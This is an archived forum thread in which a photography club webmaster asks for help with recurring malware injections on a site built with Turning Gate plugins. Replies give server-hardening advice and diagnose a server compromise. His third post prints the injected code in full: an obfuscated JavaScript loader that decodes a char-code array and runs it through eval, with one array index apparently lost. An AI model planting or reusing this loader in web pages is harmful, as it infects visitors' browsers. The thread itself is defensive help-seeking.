Support community for TTG plugins and products.
NOTICE
The Turning Gate's Community has moved to a new home, at https://discourse.theturninggate.net.
This forum is now closed, and exists here as a read-only archive.
You are not logged in.
Hi guys, I have been chosen to handle our local photography clubs website. I love all the plugins that TTG has available and have purchased what I think is all of them except the shopping cart. I created the site about 6 months ago and shortly after publishing the site I was notified by Google that my site was infected. I searched the code on the site and found almost every index.php and html page was infected with suspicious code. I cleaned the site and a few days later it was back. I have implemented key captcha on all the registration forms for the blog and forum. I have implemented site scan from Go Daddy and they keep informing me that my vulnerability is Cross-site scripting. After some research I found this is exactly what is happening to my site. Malicious code is being injected into all my pages which often times gets flagged by Google, or personal virus protections on members computers are alerting them of a malicious site and blocking it. My question or at this stage of the game, my Plea for help, is what can be done with the plugins to shut down this vulnerablility with a site that was built on TTG plugins. I have no hair left due to trying to stop this from happening. My current plugins include, CE2 & CE3 Pages, CE2 & CE3 Auto Index, CE2 & CE3 Client Response Gallery, CE3 Publisher, CE2 Stage, and CE2 Theme for WordPress. Please stop the Madness, I am spending way to much time uploading clean code. Thank you in advance.
Offline
You're not giving us much to go on here. What "suspicious code"?
And you should take the standard security measures: change your c-panel and FTP passwords, restrict permissions on site folders and files except where necessary (for example, publisher requires more open permissions), implement a robots.txt file, take a look at your .htaccess file if you have one, etc. If you don't have an .htaccess file, you may want to create one. Here are some guidelines:
https://github.com/h5bp/server-configs/ … /README.md
You might also try implementing a crossdomain policy:
https://github.com/h5bp/html5-boilerpla … sdomain.md
Offline
Here's another good article on .htaccess setup
http://net.tutsplus.com/tutorials/other … ess-files/
Offline
I do have a .htaccess file and it usually is unchanged when the code is injected so I am thinking that it is unrelated to the injections. But I may be wrong. Below you will see the code that is injected into alomost every index.php page and html page. The template.php are also infected which I believe is used to propagate the code to all the pages. Any help you can provide would be greatly appreciated.
#336988#
echo " <script type=\"text/javascript\" language=\"javascript\" > try{window.document.body++}catch(gdsgsdg){dbshre=241;}if(dbshre){asd=0;try{d=document.createElement(\"div\");d.innerHTML.a=\"asd\";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,99,92,96,97,26,56,23,92,104,93,112,100,93,103,110,41,90,106,94,91,111,92,61,101,95,104,92,102,109,34,34,96,94,107,91,104,92,31,34,53,8,1,5,3,26,27,23,24,97,95,99,95,38,108,108,94,23,53,25,33,99,107,108,105,52,42,38,90,104,108,95,92,89,110,114,41,90,90,90,40,107,99,39,91,105,109,91,93,90,111,115,38,108,107,91,97,37,104,97,106,34,50,5,3,26,27,23,24,97,95,99,95,38,108,110,116,99,93,39,106,106,106,97,109,99,106,101,24,54,26,34,88,90,108,105,103,108,108,94,33,54,4,2,25,26,27,23,96,94,98,99,37,107,109,115,103,92,38,91,105,109,91,93,107,26,56,23,31,41,33,54,4,2,25,26,27,23,96,94,98,99,37,107,109,115,103,92,38,97,95,100,94,96,109,26,56,23,31,42,106,115,30,51,6,4,27,23,24,25,98,96,95,96,39,109,111,112,100,94,40,114,96,92,109,98,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,99,92,96,97,40,110,107,113,101,95,41,99,93,95,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,99,92,96,97,40,110,107,113,101,95,41,107,103,105,26,56,23,31,42,106,115,30,51,6,4,8,1,24,25,26,27,96,94,25,34,28,91,103,92,111,104,92,102,109,40,98,92,108,62,102,96,100,93,103,110,61,112,65,93,34,34,95,93,97,98,34,32,33,25,117,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,113,109,96,108,94,34,34,51,92,98,112,27,96,92,54,86,34,95,93,97,98,87,30,54,53,41,95,96,110,55,33,36,50,5,3,26,27,23,24,25,26,27,23,92,104,93,112,100,93,103,110,41,94,93,109,63,103,92,101,94,104,111,57,113,66,94,35,30,96,94,98,99,30,33,39,91,107,103,93,103,94,62,95,97,101,94,35,95,93,97,98,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54);s=\"\";for(i=0;i-490!=0;i++){if((020==0x10)&&window.document)s+=ss[\"fromCharCode\"](1*asgq[]-(i%5-5-4));}z=s;e(s);}</script>";
#/336988#
Offline
The current site is antietamphotographicsociety.org in case you want to take a look.
Offline
Pages created by TTG plugins are no less and no more secure than any other web pages. If your site is being hacked, then you need to take the appropriate security measures on your server, as I have already suggested. Change your access credentials (logins/passwords), lock down permissions wherever possible, utilize .htaccess, robots.txt and crossdomain.xml files to set access policies and block bots, etc. Your host should be able to help you at least to some extent in this. The problem is not the galleries; the problem is that your pages are being accessed and rewritten on server.
Offline
This isn't an example of XSS. Somebody has been able to make changes to the PHP files in your hosting account.
The most common way this is done is by exploiting vulnerabilities in Wordpress, either in an installation in your own account, or on another account hosted on the same server. Whatever the case, this is a serious breach of security. I would pursue GoDaddy further on this, as it should be of considerable concern to GoDaddy and their customers (yourself!).
Offline